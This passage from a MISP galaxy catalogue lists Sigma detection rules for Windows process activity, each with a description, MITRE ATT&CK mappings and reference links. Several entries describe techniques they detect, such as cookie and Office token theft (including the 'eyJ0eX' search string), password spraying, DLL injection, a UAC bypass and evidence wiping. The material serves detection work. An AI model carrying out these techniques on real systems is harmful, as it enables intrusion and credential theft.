  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10201. Table References

Links

https://twitter.com/bohops/status/1583916360404729857

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml

Cmd.EXE Missing Space Characters Execution Anomaly

Detects Windows command lines that miss a space before or after the /c flag when running a command using cmd.exe. This could be a sign of obfuscation or of a fat finger problem (typo by the developer).

The tag is: misp-galaxy:sigma-rules="Cmd.EXE Missing Space Characters Execution Anomaly"

Cmd.EXE Missing Space Characters Execution Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10202. Table References

Links

https://twitter.com/cyb3rops/status/1562072617552678912

https://ss64.com/nt/cmd.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml

Suspicious MSDT Parent Process

Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation

The tag is: misp-galaxy:sigma-rules="Suspicious MSDT Parent Process"

Suspicious MSDT Parent Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10203. Table References

Links

https://twitter.com/nao_sec/status/1530196847679401984

https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml

Potential PowerShell Command Line Obfuscation

Detects the PowerShell command lines with special characters

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Command Line Obfuscation"

Potential PowerShell Command Line Obfuscation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10204. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml

Potential Unquoted Service Path Reconnaissance Via Wmic.EXE

Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts

The tag is: misp-galaxy:sigma-rules="Potential Unquoted Service Path Reconnaissance Via Wmic.EXE"

Potential Unquoted Service Path Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10205. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py

https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml

Suspicious Desktopimgdownldr Command

Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet

The tag is: misp-galaxy:sigma-rules="Suspicious Desktopimgdownldr Command"

Suspicious Desktopimgdownldr Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10206. Table References

Links

https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/

https://twitter.com/SBousseaden/status/1278977301745741825

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml

HackTool - Certipy Execution

Detects Certipy, a tool for Active Directory Certificate Services enumeration and abuse, based on PE metadata characteristics and common command line arguments.

The tag is: misp-galaxy:sigma-rules="HackTool - Certipy Execution"

HackTool - Certipy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Authentication Certificates - T1649" with estimative-language:likelihood-probability="almost-certain"

Table 10207. Table References

Links

https://github.com/ly4k/Certipy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certipy.yml

Potential Commandline Obfuscation Using Escape Characters

Detects potential commandline obfuscation using known escape characters

The tag is: misp-galaxy:sigma-rules="Potential Commandline Obfuscation Using Escape Characters"

Potential Commandline Obfuscation Using Escape Characters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 10208. Table References

Links

https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/

https://twitter.com/Hexacorn/status/885553465417756673

https://twitter.com/Hexacorn/status/885570278637678592

https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques

https://twitter.com/vysecurity/status/885545634958385153

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml

PowerShell DownloadFile

Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line

The tag is: misp-galaxy:sigma-rules="PowerShell DownloadFile"

PowerShell DownloadFile has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10209. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml

Unusual Child Process of dns.exe

Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

The tag is: misp-galaxy:sigma-rules="Unusual Child Process of dns.exe"

Unusual Child Process of dns.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 10210. Table References

Links

https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_susp_child_process.yml

Invoke-Obfuscation CLIP+ Launcher

Detects obfuscated use of Clip.exe to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation CLIP+ Launcher"

Invoke-Obfuscation CLIP+ Launcher has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10211. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml

Potential Password Spraying Attempt Using Dsacls.EXE

Detects possible password spraying attempts using Dsacls

The tag is: misp-galaxy:sigma-rules="Potential Password Spraying Attempt Using Dsacls.EXE"

Potential Password Spraying Attempt Using Dsacls.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10212. Table References

Links

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)

https://ss64.com/nt/dsacls.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml

SQLite Chromium Profile Data DB Access

Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.

The tag is: misp-galaxy:sigma-rules="SQLite Chromium Profile Data DB Access"

SQLite Chromium Profile Data DB Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 10213. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows

https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml

PsExec Service Execution

Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution

The tag is: misp-galaxy:sigma-rules="PsExec Service Execution"

Table 10214. Table References

Links

https://www.youtube.com/watch?v=ro2QuZTIMBM

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc.yml

Potential DLL Injection Or Execution Using Tracker.exe

Detects potential DLL injection and execution using "Tracker.exe"

The tag is: misp-galaxy:sigma-rules="Potential DLL Injection Or Execution Using Tracker.exe"

Potential DLL Injection Or Execution Using Tracker.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

Table 10215. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml

Potentially Suspicious PowerShell Child Processes

Detects potentially suspicious child processes spawned by PowerShell

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious PowerShell Child Processes"

Potentially Suspicious PowerShell Child Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10216. Table References

Links

https://twitter.com/ankit_anubhav/status/1518835408502620162

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_child_processes.yml

HackTool - CrackMapExec Process Patterns

Detects suspicious process patterns found in logs when CrackMapExec is used

The tag is: misp-galaxy:sigma-rules="HackTool - CrackMapExec Process Patterns"

HackTool - CrackMapExec Process Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10217. Table References

Links

https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml

Portable Gpg.EXE Execution

Detects the execution of "gpg.exe" from an uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.

The tag is: misp-galaxy:sigma-rules="Portable Gpg.EXE Execution"

Portable Gpg.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 10218. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md

https://securelist.com/locked-out/68960/

https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_portable_execution.yml

Suspicious Child Process Of Manage Engine ServiceDesk

Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Of Manage Engine ServiceDesk"

Suspicious Child Process Of Manage Engine ServiceDesk has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 10219. Table References

Links

https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/

https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py

https://blog.viettelcybersecurity.com/saml-show-stopper/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml

New Port Forwarding Rule Added Via Netsh.EXE

Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule

The tag is: misp-galaxy:sigma-rules="New Port Forwarding Rule Added Via Netsh.EXE"

New Port Forwarding Rule Added Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10220. Table References

Links

https://adepts.of0x.cc/netsh-portproxy-code/

https://www.dfirnotes.net/portproxy_detection/

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml

Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script

Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a specific script to run for a specific VM state

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script"

Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10221. Table References

Links

https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/

https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml

Potential Execution of Sysinternals Tools

Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools

The tag is: misp-galaxy:sigma-rules="Potential Execution of Sysinternals Tools"

Potential Execution of Sysinternals Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 10222. Table References

Links

https://twitter.com/Moti_B/status/1008587936735035392

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml

Suspicious Schtasks Execution AppData Folder

Detects the creation of a schtask that executes a file from C:\Users\<USER>\AppData\Local

The tag is: misp-galaxy:sigma-rules="Suspicious Schtasks Execution AppData Folder"

Suspicious Schtasks Execution AppData Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10223. Table References

Links

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml

Suspicious Runscripthelper.exe

Detects execution of PowerShell scripts via Runscripthelper.exe

The tag is: misp-galaxy:sigma-rules="Suspicious Runscripthelper.exe"

Suspicious Runscripthelper.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10224. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml

UAC Bypass Using Disk Cleanup

Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Disk Cleanup"

UAC Bypass Using Disk Cleanup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10225. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml

Suspicious Parent Double Extension File Execution

Detects the execution of suspicious double-extension files in the ParentCommandLine

The tag is: misp-galaxy:sigma-rules="Suspicious Parent Double Extension File Execution"

Suspicious Parent Double Extension File Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007" with estimative-language:likelihood-probability="almost-certain"

Table 10226. Table References

Links

https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml

ZOHO Dctask64 Process Injection

Detects suspicious process injection using ZOHO’s dctask64.exe

The tag is: misp-galaxy:sigma-rules="ZOHO Dctask64 Process Injection"

ZOHO Dctask64 Process Injection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

Table 10227. Table References

Links

https://twitter.com/gN3mes1s/status/1222095371175911424

https://twitter.com/gN3mes1s/status/1222095963789111296

https://twitter.com/gN3mes1s/status/1222088214581825540

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml

Imports Registry Key From an ADS

Detects the import of an alternate data stream (ADS) into the registry with regedit.exe.

The tag is: misp-galaxy:sigma-rules="Imports Registry Key From an ADS"

Imports Registry Key From an ADS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10229. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml

Suspicious Binary In User Directory Spawned From Office Application

Detects an executable in the user's directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)

The tag is: misp-galaxy:sigma-rules="Suspicious Binary In User Directory Spawned From Office Application"

Suspicious Binary In User Directory Spawned From Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 10230. Table References

Links

https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign

https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml

Detect Virtualbox Driver Installation OR Starting Of VMs

Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.

The tag is: misp-galaxy:sigma-rules="Detect Virtualbox Driver Installation OR Starting Of VMs"

Detect Virtualbox Driver Installation OR Starting Of VMs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 10231. Table References

Links

https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_execution.yml

Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution

Detects execution of Windows Defender "OfflineScannerShell.exe" from a non-standard directory. The "OfflineScannerShell.exe" binary is vulnerable to DLL side-loading and will load any DLL named "mpclient.dll" from the current working directory.

The tag is: misp-galaxy:sigma-rules="Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution"

Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10232. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml

Potential Data Stealing Via Chromium Headless Debugging

Detects Chromium-based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control

The tag is: misp-galaxy:sigma-rules="Potential Data Stealing Via Chromium Headless Debugging"

Potential Data Stealing Via Chromium Headless Debugging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"

Table 10233. Table References

Links

https://github.com/defaultnamehere/cookie_crimes/

https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/

https://mango.pdf.zone/stealing-chrome-cookies-without-a-password

https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml

Suspicious Office Token Search Via CLI

Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.

The tag is: misp-galaxy:sigma-rules="Suspicious Office Token Search Via CLI"

Suspicious Office Token Search Via CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 10234. Table References

Links

https://mrd0x.com/stealing-tokens-from-office-applications/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml

Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE

Detects potential malicious and unauthorized usage of bcdedit.exe

The tag is: misp-galaxy:sigma-rules="Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE"

Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"

Table 10235. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set

https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_susp_execution.yml

DirLister Execution

Detects the usage of "DirLister.exe", a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.

The tag is: misp-galaxy:sigma-rules="DirLister Execution"

DirLister Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 10236. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md

https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml

Devtoolslauncher.exe Executes Specified Binary

Detects Devtoolslauncher.exe executing another binary

The tag is: misp-galaxy:sigma-rules="Devtoolslauncher.exe Executes Specified Binary"

Devtoolslauncher.exe Executes Specified Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10237. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/

https://twitter.com/_felamos/status/1179811992841797632

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml

File Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration

The tag is: misp-galaxy:sigma-rules="File Encoded To Base64 Via Certutil.EXE"

File Encoded To Base64 Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10238. Table References

Links

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

https://lolbas-project.github.io/lolbas/Binaries/Certutil/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode.yml

Potential Privilege Escalation via Service Permissions Weakness

Detects modification of service configuration (ImagePath, FailureCommand and ServiceDLL) in the registry by processes with Medium integrity level

The tag is: misp-galaxy:sigma-rules="Potential Privilege Escalation via Service Permissions Weakness"

Potential Privilege Escalation via Service Permissions Weakness has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10239. Table References

Links

https://pentestlab.blog/2017/03/31/insecure-registry-permissions/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml

Potential Renamed Rundll32 Execution

Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection

The tag is: misp-galaxy:sigma-rules="Potential Renamed Rundll32 Execution"

Table 10240. Table References

Links

https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/

https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml

New ActiveScriptEventConsumer Created Via Wmic.EXE

Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence

The tag is: misp-galaxy:sigma-rules="New ActiveScriptEventConsumer Created Via Wmic.EXE"

New ActiveScriptEventConsumer Created Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 10241. Table References

Links

https://twitter.com/johnlatwc/status/1408062131321270282?s=12

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml

Potential Privilege Escalation To LOCAL SYSTEM

Detects an unknown program using command-line flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM privileges

The tag is: misp-galaxy:sigma-rules="Potential Privilege Escalation To LOCAL SYSTEM"

Potential Privilege Escalation To LOCAL SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 10242. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://www.poweradmin.com/paexec/

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml

Possible Privilege Escalation via Weak Service Permissions

Detects the sc.exe utility being spawned by a user with Medium integrity level to change a service's ImagePath or FailureCommand

The tag is: misp-galaxy:sigma-rules="Possible Privilege Escalation via Weak Service Permissions"

Possible Privilege Escalation via Weak Service Permissions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10243. Table References

Links

https://pentestlab.blog/2017/03/30/weak-service-permissions/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml

ShimCache Flush

Detects actions that clear the local ShimCache and remove forensic evidence

The tag is: misp-galaxy:sigma-rules="ShimCache Flush"

ShimCache Flush has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10244. Table References

Links

https://medium.com/@blueteamops/shimcache-flush-89daff28d15e

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml

Console CodePage Lookup Via CHCP

Detects use of chcp to look up the system locale value as part of host discovery

The tag is: misp-galaxy:sigma-rules="Console CodePage Lookup Via CHCP"

Console CodePage Lookup Via CHCP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 10245. Table References

Links

https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp

